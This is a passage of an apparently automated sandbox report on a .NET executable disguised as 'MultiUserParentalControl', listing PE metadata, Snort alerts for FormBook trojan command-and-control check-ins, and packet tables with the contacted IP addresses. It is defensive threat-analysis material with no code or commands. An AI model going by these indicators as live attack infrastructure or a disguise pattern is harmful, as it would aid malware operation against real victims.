IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8b89c	0x8ba00	False	0.909556498993	data	7.87325624696	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8e000	0x2414	0x2600	False	0.834703947368	data	7.55839621208	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x8e130	0x1d9d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x8fed0	0x14	data
RT_VERSION	0x8fee4	0x344	data
RT_MANIFEST	0x90228	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	MultiUserParentalControl
ProductVersion	1.0.0.0
FileDescription	MultiUserParentalControl
OriginalFilename	.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-21:04:29.053590	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
01/13/21-21:04:33.449709	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	173.234.175.134
01/13/21-21:04:33.449709	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	173.234.175.134
01/13/21-21:04:33.449709	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	173.234.175.134
01/13/21-21:04:49.742833	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49755	45.77.226.209	192.168.2.3
01/13/21-21:04:54.974946	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.3	142.44.212.169
01/13/21-21:04:54.974946	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.3	142.44.212.169
01/13/21-21:04:54.974946	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.3	142.44.212.169
01/13/21-21:05:00.772898	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49758	34.102.136.180	192.168.2.3
01/13/21-21:05:11.046991	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.3	34.102.136.180
01/13/21-21:05:11.046991	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.3	34.102.136.180
01/13/21-21:05:11.046991	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.3	34.102.136.180
01/13/21-21:05:11.186150	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49760	34.102.136.180	192.168.2.3
01/13/21-21:05:22.236081	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49761	80	192.168.2.3	192.155.166.181
01/13/21-21:05:22.236081	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49761	80	192.168.2.3	192.155.166.181
01/13/21-21:05:22.236081	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49761	80	192.168.2.3	192.155.166.181
01/13/21-21:05:27.905106	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.3	205.134.254.189
01/13/21-21:05:27.905106	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.3	205.134.254.189
01/13/21-21:05:27.905106	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49765	80	192.168.2.3	205.134.254.189
01/13/21-21:05:58.107974	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
01/13/21-21:05:59.126867	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
01/13/21-21:06:02.573239	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49769	80	192.168.2.3	173.234.175.134
01/13/21-21:06:02.573239	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49769	80	192.168.2.3	173.234.175.134
01/13/21-21:06:02.573239	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49769	80	192.168.2.3	173.234.175.134
01/13/21-21:06:18.245893	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49771	45.77.226.209	192.168.2.3
01/13/21-21:06:23.388032	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49772	80	192.168.2.3	142.44.212.169
01/13/21-21:06:23.388032	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49772	80	192.168.2.3	142.44.212.169
01/13/21-21:06:23.388032	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49772	80	192.168.2.3	142.44.212.169

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:04:33.256691933 CET	49742	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:04:33.448252916 CET	80	49742	173.234.175.134	192.168.2.3
Jan 13, 2021 21:04:33.449577093 CET	49742	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:04:33.449708939 CET	49742	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:04:33.642399073 CET	80	49742	173.234.175.134	192.168.2.3
Jan 13, 2021 21:04:33.642426014 CET	80	49742	173.234.175.134	192.168.2.3
Jan 13, 2021 21:04:33.642443895 CET	80	49742	173.234.175.134	192.168.2.3
Jan 13, 2021 21:04:33.642457962 CET	80	49742	173.234.175.134	192.168.2.3
Jan 13, 2021 21:04:33.642595053 CET	49742	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:04:33.642644882 CET	49742	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:04:33.833941936 CET	80	49742	173.234.175.134	192.168.2.3
Jan 13, 2021 21:04:49.625839949 CET	49755	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:04:49.676454067 CET	80	49755	45.77.226.209	192.168.2.3
Jan 13, 2021 21:04:49.678884029 CET	49755	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:04:49.690268040 CET	49755	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:04:49.740910053 CET	80	49755	45.77.226.209	192.168.2.3
Jan 13, 2021 21:04:49.742832899 CET	80	49755	45.77.226.209	192.168.2.3
Jan 13, 2021 21:04:49.742876053 CET	80	49755	45.77.226.209	192.168.2.3
Jan 13, 2021 21:04:49.743067026 CET	49755	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:04:49.743123055 CET	49755	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:04:49.793448925 CET	80	49755	45.77.226.209	192.168.2.3
Jan 13, 2021 21:04:54.838032007 CET	49756	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:04:54.974657059 CET	80	49756	142.44.212.169	192.168.2.3
Jan 13, 2021 21:04:54.974843979 CET	49756	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:04:54.974946022 CET	49756	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:04:55.111336946 CET	80	49756	142.44.212.169	192.168.2.3
Jan 13, 2021 21:04:55.482732058 CET	49756	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:04:55.659183025 CET	80	49756	142.44.212.169	192.168.2.3
Jan 13, 2021 21:04:55.720679045 CET	80	49756	142.44.212.169	192.168.2.3
Jan 13, 2021 21:04:55.720735073 CET	80	49756	142.44.212.169	192.168.2.3
Jan 13, 2021 21:04:55.720894098 CET	49756	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:04:55.720959902 CET	49756	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:05:00.593950987 CET	49758	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:00.633949041 CET	80	49758	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:00.634141922 CET	49758	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:00.634299994 CET	49758	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:00.674240112 CET	80	49758	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:00.772897959 CET	80	49758	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:00.772942066 CET	80	49758	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:00.773113012 CET	49758	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:00.773164988 CET	49758	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:00.813136101 CET	80	49758	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:05.852662086 CET	49759	80	192.168.2.3	192.0.78.208
Jan 13, 2021 21:05:05.892638922 CET	80	49759	192.0.78.208	192.168.2.3
Jan 13, 2021 21:05:05.892823935 CET	49759	80	192.168.2.3	192.0.78.208
Jan 13, 2021 21:05:05.893126011 CET	49759	80	192.168.2.3	192.0.78.208
Jan 13, 2021 21:05:05.933036089 CET	80	49759	192.0.78.208	192.168.2.3
Jan 13, 2021 21:05:05.933063984 CET	80	49759	192.0.78.208	192.168.2.3
Jan 13, 2021 21:05:05.933075905 CET	80	49759	192.0.78.208	192.168.2.3
Jan 13, 2021 21:05:05.933339119 CET	49759	80	192.168.2.3	192.0.78.208
Jan 13, 2021 21:05:05.933398008 CET	49759	80	192.168.2.3	192.0.78.208
Jan 13, 2021 21:05:05.973464966 CET	80	49759	192.0.78.208	192.168.2.3
Jan 13, 2021 21:05:11.006270885 CET	49760	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:11.046574116 CET	80	49760	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:11.046734095 CET	49760	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:11.046991110 CET	49760	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:11.087112904 CET	80	49760	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:11.186150074 CET	80	49760	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:11.186450005 CET	49760	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:11.186574936 CET	80	49760	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:11.186657906 CET	49760	80	192.168.2.3	34.102.136.180
Jan 13, 2021 21:05:11.226603985 CET	80	49760	34.102.136.180	192.168.2.3
Jan 13, 2021 21:05:21.584244013 CET	49761	80	192.168.2.3	192.155.166.181
Jan 13, 2021 21:05:21.804228067 CET	80	49761	192.155.166.181	192.168.2.3
Jan 13, 2021 21:05:21.805689096 CET	49761	80	192.168.2.3	192.155.166.181
Jan 13, 2021 21:05:22.236080885 CET	49761	80	192.168.2.3	192.155.166.181
Jan 13, 2021 21:05:22.456119061 CET	80	49761	192.155.166.181	192.168.2.3
Jan 13, 2021 21:05:22.461457014 CET	80	49761	192.155.166.181	192.168.2.3
Jan 13, 2021 21:05:22.461481094 CET	80	49761	192.155.166.181	192.168.2.3
Jan 13, 2021 21:05:22.461760044 CET	49761	80	192.168.2.3	192.155.166.181
Jan 13, 2021 21:05:22.462353945 CET	49761	80	192.168.2.3	192.155.166.181
Jan 13, 2021 21:05:22.682168961 CET	80	49761	192.155.166.181	192.168.2.3
Jan 13, 2021 21:05:27.708574057 CET	49765	80	192.168.2.3	205.134.254.189
Jan 13, 2021 21:05:27.904743910 CET	80	49765	205.134.254.189	192.168.2.3
Jan 13, 2021 21:05:27.904849052 CET	49765	80	192.168.2.3	205.134.254.189
Jan 13, 2021 21:05:27.905106068 CET	49765	80	192.168.2.3	205.134.254.189
Jan 13, 2021 21:05:28.101125002 CET	80	49765	205.134.254.189	192.168.2.3
Jan 13, 2021 21:05:28.102826118 CET	80	49765	205.134.254.189	192.168.2.3
Jan 13, 2021 21:05:28.102847099 CET	80	49765	205.134.254.189	192.168.2.3
Jan 13, 2021 21:05:28.103200912 CET	49765	80	192.168.2.3	205.134.254.189
Jan 13, 2021 21:05:28.103319883 CET	49765	80	192.168.2.3	205.134.254.189
Jan 13, 2021 21:05:28.299376011 CET	80	49765	205.134.254.189	192.168.2.3
Jan 13, 2021 21:05:38.449443102 CET	49766	80	192.168.2.3	146.148.193.212
Jan 13, 2021 21:05:38.634325981 CET	80	49766	146.148.193.212	192.168.2.3
Jan 13, 2021 21:05:38.638170004 CET	49766	80	192.168.2.3	146.148.193.212
Jan 13, 2021 21:05:38.638372898 CET	49766	80	192.168.2.3	146.148.193.212
Jan 13, 2021 21:05:38.823539019 CET	80	49766	146.148.193.212	192.168.2.3
Jan 13, 2021 21:05:38.823584080 CET	80	49766	146.148.193.212	192.168.2.3
Jan 13, 2021 21:05:38.823596001 CET	80	49766	146.148.193.212	192.168.2.3
Jan 13, 2021 21:05:38.824080944 CET	49766	80	192.168.2.3	146.148.193.212
Jan 13, 2021 21:05:38.824233055 CET	49766	80	192.168.2.3	146.148.193.212
Jan 13, 2021 21:05:38.833403111 CET	80	49766	146.148.193.212	192.168.2.3
Jan 13, 2021 21:05:38.833514929 CET	49766	80	192.168.2.3	146.148.193.212
Jan 13, 2021 21:05:39.009578943 CET	80	49766	146.148.193.212	192.168.2.3
Jan 13, 2021 21:05:44.224528074 CET	49767	80	192.168.2.3	23.105.124.225
Jan 13, 2021 21:05:44.418430090 CET	80	49767	23.105.124.225	192.168.2.3
Jan 13, 2021 21:05:44.419608116 CET	49767	80	192.168.2.3	23.105.124.225
Jan 13, 2021 21:05:44.419821978 CET	49767	80	192.168.2.3	23.105.124.225
Jan 13, 2021 21:05:44.658860922 CET	80	49767	23.105.124.225	192.168.2.3
Jan 13, 2021 21:05:44.924233913 CET	49767	80	192.168.2.3	23.105.124.225
Jan 13, 2021 21:05:45.177237988 CET	80	49767	23.105.124.225	192.168.2.3
Jan 13, 2021 21:05:50.009622097 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:05:50.137120962 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.137672901 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:05:50.138555050 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:05:50.265490055 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268177986 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268213034 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268237114 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268254995 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268275976 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268301010 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268323898 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268348932 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268371105 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268393040 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.268460989 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:05:50.268492937 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:05:50.268548012 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:05:50.395473003 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.395498037 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.395512104 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.395528078 CET	80	49768	198.49.23.144	192.168.2.3
Jan 13, 2021 21:05:50.395622969 CET	49768	80	192.168.2.3	198.49.23.144
Jan 13, 2021 21:06:02.379206896 CET	49769	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:06:02.571186066 CET	80	49769	173.234.175.134	192.168.2.3
Jan 13, 2021 21:06:02.573093891 CET	49769	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:06:02.573239088 CET	49769	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:06:02.767956018 CET	80	49769	173.234.175.134	192.168.2.3
Jan 13, 2021 21:06:02.767982006 CET	80	49769	173.234.175.134	192.168.2.3
Jan 13, 2021 21:06:02.767997026 CET	80	49769	173.234.175.134	192.168.2.3
Jan 13, 2021 21:06:02.768013000 CET	80	49769	173.234.175.134	192.168.2.3
Jan 13, 2021 21:06:02.768239021 CET	49769	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:06:02.768265963 CET	49769	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:06:02.768311977 CET	49769	80	192.168.2.3	173.234.175.134
Jan 13, 2021 21:06:02.959996939 CET	80	49769	173.234.175.134	192.168.2.3
Jan 13, 2021 21:06:18.139916897 CET	49771	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:06:18.190587997 CET	80	49771	45.77.226.209	192.168.2.3
Jan 13, 2021 21:06:18.190740108 CET	49771	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:06:18.190871000 CET	49771	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:06:18.241178989 CET	80	49771	45.77.226.209	192.168.2.3
Jan 13, 2021 21:06:18.245893002 CET	80	49771	45.77.226.209	192.168.2.3
Jan 13, 2021 21:06:18.245923042 CET	80	49771	45.77.226.209	192.168.2.3
Jan 13, 2021 21:06:18.246098995 CET	49771	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:06:18.246148109 CET	49771	80	192.168.2.3	45.77.226.209
Jan 13, 2021 21:06:18.296648026 CET	80	49771	45.77.226.209	192.168.2.3
Jan 13, 2021 21:06:23.249660015 CET	49772	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:06:23.387782097 CET	80	49772	142.44.212.169	192.168.2.3
Jan 13, 2021 21:06:23.387914896 CET	49772	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:06:23.388031960 CET	49772	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:06:23.525933027 CET	80	49772	142.44.212.169	192.168.2.3
Jan 13, 2021 21:06:23.890302896 CET	49772	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:06:24.067754030 CET	80	49772	142.44.212.169	192.168.2.3
Jan 13, 2021 21:06:24.072344065 CET	80	49772	142.44.212.169	192.168.2.3
Jan 13, 2021 21:06:24.072387934 CET	80	49772	142.44.212.169	192.168.2.3
Jan 13, 2021 21:06:24.072495937 CET	49772	80	192.168.2.3	142.44.212.169
Jan 13, 2021 21:06:24.072547913 CET	49772	80	192.168.2.3	142.44.212.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:03:32.107090950 CET	65110	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:32.155076981 CET	53	65110	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:33.403271914 CET	58361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:33.451320887 CET	53	58361	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:34.588206053 CET	63492	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:34.640042067 CET	53	63492	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:35.807763100 CET	60831	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:35.866738081 CET	53	60831	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:36.795548916 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:36.847487926 CET	53	60100	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:38.062551022 CET	53195	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:38.110658884 CET	53	53195	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:39.532286882 CET	50141	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:39.582921982 CET	53	50141	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:40.645405054 CET	53023	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:40.693166971 CET	53	53023	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:41.567195892 CET	49563	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:41.615120888 CET	53	49563	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:42.791860104 CET	51352	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:42.839807034 CET	53	51352	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:44.707129002 CET	59349	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:44.755547047 CET	53	59349	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:45.937158108 CET	57084	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:45.985148907 CET	53	57084	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:47.207340002 CET	58823	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:47.255136967 CET	53	58823	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:48.196248055 CET	57568	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:48.245688915 CET	53	57568	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:50.160382986 CET	50540	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:50.214705944 CET	53	50540	8.8.8.8	192.168.2.3
Jan 13, 2021 21:03:56.003659010 CET	54366	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:03:56.082838058 CET	53	54366	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:01.437932014 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:01.485913992 CET	53	53034	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:15.029310942 CET	57762	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:15.086632013 CET	53	57762	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:19.399761915 CET	55435	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:19.448080063 CET	53	55435	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:20.814989090 CET	50713	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:20.875763893 CET	53	50713	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:26.231012106 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:26.644450903 CET	58987	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:26.702014923 CET	53	58987	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:27.245870113 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:28.032321930 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:29.053430080 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:33.048207998 CET	56579	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:33.252438068 CET	53	56579	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:36.666981936 CET	60633	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:36.794030905 CET	53	60633	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:37.342623949 CET	61292	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:37.422462940 CET	53	61292	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:37.988605022 CET	63619	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:38.044975042 CET	53	63619	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:38.510776043 CET	64938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:38.567425966 CET	53	64938	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:38.657728910 CET	61946	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:39.050699949 CET	53	61946	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:39.057087898 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:39.113562107 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:39.671612024 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:39.731230974 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:40.546530008 CET	56130	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:40.605827093 CET	53	56130	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:40.704773903 CET	56338	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:40.768801928 CET	53	56338	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:41.428122997 CET	59420	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:41.484390974 CET	53	59420	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:43.052429914 CET	58784	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:43.100449085 CET	53	58784	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:43.597229958 CET	63978	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:43.653685093 CET	53	63978	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:44.082952976 CET	62938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:44.243922949 CET	53	62938	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:49.551908016 CET	55708	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:49.624840021 CET	53	55708	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:54.751828909 CET	56803	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:54.836445093 CET	53	56803	8.8.8.8	192.168.2.3
Jan 13, 2021 21:04:59.489957094 CET	57145	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:04:59.546482086 CET	53	57145	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:00.530175924 CET	55359	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:00.592801094 CET	53	55359	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:05.785716057 CET	58306	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:05.850408077 CET	53	58306	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:10.945827961 CET	64124	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:11.003951073 CET	53	64124	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:21.233468056 CET	49361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:21.578461885 CET	53	49361	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:24.494661093 CET	63150	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:25.204083920 CET	53279	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:25.255053043 CET	53	53279	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:25.516793013 CET	63150	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:25.564650059 CET	53	63150	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:27.478451014 CET	56881	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:27.704834938 CET	53	56881	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:33.115914106 CET	53642	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:33.178495884 CET	53	53642	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:38.215327024 CET	55667	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:38.447403908 CET	53	55667	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:43.839272976 CET	54833	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:44.220861912 CET	53	54833	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:49.944683075 CET	62476	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:50.007997036 CET	53	62476	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:55.316931963 CET	49705	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:56.331440926 CET	49705	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:57.347142935 CET	49705	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:05:57.374772072 CET	53	49705	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:58.107872963 CET	53	49705	8.8.8.8	192.168.2.3
Jan 13, 2021 21:05:59.126219034 CET	53	49705	8.8.8.8	192.168.2.3
Jan 13, 2021 21:06:07.773875952 CET	61477	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:06:07.833264112 CET	53	61477	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 13, 2021 21:04:29.053590059 CET	192.168.2.3	8.8.8.8	cff4	(Port unreachable)	Destination Unreachable
Jan 13, 2021 21:05:58.107974052 CET	192.168.2.3	8.8.8.8	cff4	(Port unreachable)	Destination Unreachable
Jan 13, 2021 21:05:59.126867056 CET	192.168.2.3	8.8.8.8	cff4	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
